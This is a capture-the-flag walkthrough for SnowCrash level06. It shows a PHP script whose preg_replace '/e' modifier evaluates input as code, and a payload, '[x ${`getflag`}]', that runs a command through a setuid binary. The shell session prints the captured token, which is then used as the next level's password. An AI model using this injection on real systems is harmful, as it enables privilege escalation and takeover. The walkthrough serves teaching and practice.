level06@SnowCrash:~$ ls -l
total 12
-rwsr-x---+ 1 flag06 level06 7503 Aug 30  2015 level06
-rwxr-x---  1 flag06 level06  356 Mar  5  2016 level06.php
level06@SnowCrash:~$



The owner of 'level06' executable and 'level06.php' script is 'flag06' we'll probably exploit at least one of them



level06@SnowCrash:~$ cat level06.php 
#!/usr/bin/php
<?php
function y($m) { $m = preg_replace("/\./", " x ", $m); $m = preg_replace("/@/", " y", $m); return $m; }
function x($y, $z) { $a = file_get_contents($y); $a = preg_replace("/(\[x (.*)\])/e", "y(\"\\2\")", $a); $a = preg_replace("/\[/", "(", $a); $a = preg_replace("/\]/", ")", $a); return $a; }
$r = x($argv[1], $argv[2]); print $r;
?>
level06@SnowCrash:~$ 



php script use the deprecated and vulnerable regex 'e' modifier So the /(\[x (.*)\])/e regex will evaluate any string arranged in the form "[x (.)]", interpret it as PHP code and call the 'y' function with "." as parameter.
This allowing us to inject code like getflag.



level06@SnowCrash:~$ echo '[x ${`getflag`}]' > /tmp/flag06
level06@SnowCrash:~$ ./level06 /tmp/flag06
PHP Notice:  Undefined variable: Check flag.Here is your token : wiok45aaoguiboiki2tuin6ub
 in /home/user/level06/level06.php(4) : regexp code on line 1

level06@SnowCrash:~$ su level07
Password: wiok45aaoguiboiki2tuin6ub
level07@SnowCrash:~$ 
